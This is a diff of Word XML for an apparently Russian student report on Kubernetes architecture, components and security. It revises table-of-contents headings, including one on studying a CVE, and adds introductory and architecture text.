             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601680 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073619 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1611,7 +1679,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>6</w:t>
+          <w:t>8</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1624,30 +1692,30 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC2"/>
+        <w:pStyle w:val="TOC1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601681" w:history="1">
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073620" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>2.1</w:t>
+          <w:t>2</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
-            <w:lang w:eastAsia="ru-RU"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1656,7 +1724,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Подраздел 1</w:t>
+          <w:t>Ход работы</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1677,7 +1745,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601681 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073620 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1697,7 +1765,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>6</w:t>
+          <w:t>10</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1714,26 +1782,30 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601682" w:history="1">
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073621" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>2.2</w:t>
+          <w:t>2.1</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
             <w:lang w:eastAsia="ru-RU"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1742,7 +1814,44 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Подраздел 2</w:t>
+          <w:t>И</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve">сследование </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>CVE</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve"> в экосистеме </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>Kubernetes</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>.</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1763,7 +1872,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601682 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073621 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1783,7 +1892,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>6</w:t>
+          <w:t>10</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1800,26 +1909,30 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601683" w:history="1">
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073622" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>2.3</w:t>
+          <w:t>2.2</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
             <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
+            <w:kern w:val="2"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
             <w:lang w:eastAsia="ru-RU"/>
+            <w14:ligatures w14:val="standardContextual"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1828,7 +1941,29 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Подраздел 3</w:t>
+          <w:t>П</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t xml:space="preserve">одготовка ос для исследования </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>CVE</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>-2026-4342</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1849,7 +1984,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601683 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073622 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1869,7 +2004,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>7</w:t>
+          <w:t>11</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1882,304 +2017,132 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC3"/>
+        <w:pStyle w:val="TOC1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601684" w:history="1">
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073623" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>2.3.1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-            <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
-            <w:lang w:eastAsia="ru-RU"/>
+          </w:rPr>
+          <w:t>ЗАКЛЮЧЕНИЕ</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
           </w:rPr>
           <w:tab/>
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Подраздел 3 уровня 1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:tab/>
+          <w:fldChar w:fldCharType="begin"/>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073623 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601684 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
+          <w:t>11</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>7</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
           <w:fldChar w:fldCharType="end"/>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC3"/>
+        <w:pStyle w:val="TOC1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601685" w:history="1">
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc231073624" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>2.3.2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-            <w:noProof/>
-            <w:sz w:val="22"/>
-            <w:szCs w:val="22"/>
-            <w:lang w:eastAsia="ru-RU"/>
+          </w:rPr>
+          <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
           </w:rPr>
           <w:tab/>
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Подраздел 3 уровня 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:tab/>
+          <w:fldChar w:fldCharType="begin"/>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc231073624 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601685 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
         </w:r>
         <w:r>
           <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>7</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC1"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601686" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>ЗАКЛЮЧЕНИЕ</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601686 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>8</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC1"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:noProof/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc210601687" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc210601687 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>9</w:t>
+          <w:t>12</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2220,132 +2183,138 @@
         </w:numPr>
         <w:jc w:val="center"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc518292916"/>
-      <w:bookmarkStart w:id="4" w:name="_Toc210601673"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc518292916"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc231073599"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>ВВЕДЕНИЕ</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc231073600"/>
+      <w:r>
+        <w:t>Цель работы</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Исследовать программное обеспечение </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>рассмотреть его архитектуру, основные компоненты, преимущества и недостатки, исследовать альтернативные решения</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, а также изучить вопросы безопасности оркестровки на примере исправленной уязвимости.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc231073601"/>
+      <w:r>
+        <w:t>Актуальность темы.</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="4"/>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">В связи с трендом перехода от монолитной архитектуры к микросервисной и ростом популяронсти контейнеров, появился спрос на оркестровщики, которые дают функционал для управления большим числом независимых </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>docker</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">контейнеров. Самым популярным средством оркестровки контейнеров является </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">С точки зрения безопасности, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">позволяет централизованно управлять защитой </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">независимых контейнеров. Также </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>имеет изолированные компоненты, например для взаимодействий между контейнерами и хранения конфиденциальной информации.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Так как компоненты </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kubernetes </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">имеют строгую спецификацию, то </w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Beginingtitlelist"/>
       </w:pPr>
-      <w:r>
-        <w:t>Цель работы</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Исследовать программное обеспечение </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>рассмотреть его архитектуру, основные компоненты, преимущества и недостатки, исследовать альтернативные решения</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, а также изучить вопросы безопасности оркестровки на примере исправленной уязвимости.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Актуальность темы.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">В связи с трендом перехода от монолитной архитектуры к микросервисной и ростом популяронсти контейнеров, появился спрос на оркестровщики, которые дают функционал для управления большим числом независимых </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>docker</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">контейнеров. Самым популярным средством оркестровки контейнеров является </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">С точки зрения безопасности, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">позволяет централизованно управлять защитой </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">независимых контейнеров. Также </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>имеет изолированные компоненты, например для взаимодействий между контейнерами и хранения конфиденциальной информации.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Так как компоненты </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Kubernetes </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">имеют строгую спецификацию, то </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc231073602"/>
       <w:r>
         <w:t>Задачи</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2518,10 +2487,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc231073603"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>ТЕОРЕТИЧЕСКИЕ ИССЛЕДОВАНИЯ</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2531,6 +2502,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc231073604"/>
       <w:r>
         <w:t xml:space="preserve">ПОНЯтие </w:t>
       </w:r>
@@ -2546,6 +2518,7 @@
       <w:r>
         <w:t>и назначение оркестровки</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2560,7 +2533,6 @@
       <w:r>
         <w:t xml:space="preserve">программное обеспечение для оркестровки контейнеризированных приложения и автоматизации их развертывания. </w:t>
       </w:r>
-      <w:bookmarkStart w:id="5" w:name="_Toc210601676"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2638,6 +2610,7 @@
         </w:numPr>
         <w:ind w:left="0" w:firstLine="0"/>
       </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc231073605"/>
       <w:r>
         <w:t xml:space="preserve">архитектура </w:t>
       </w:r>
@@ -2647,6 +2620,7 @@
         </w:rPr>
         <w:t>Kubernetes</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2684,6 +2658,174 @@
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Каждая нода представляет собой виртуальную или физическую машину.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Control</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Plane</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Главная нода) – объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>управляющая поведением всего кластера, а также позволяет контроллировать рабочие ноды и связи между ними</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Worker</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Nodes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Рабочие ноды) – объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>запускающий контейнеры для определенного приложения.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="0" w:firstLine="0"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc231073606"/>
+      <w:r>
+        <w:t xml:space="preserve">Основные компоненты </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">К основным компонентам </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
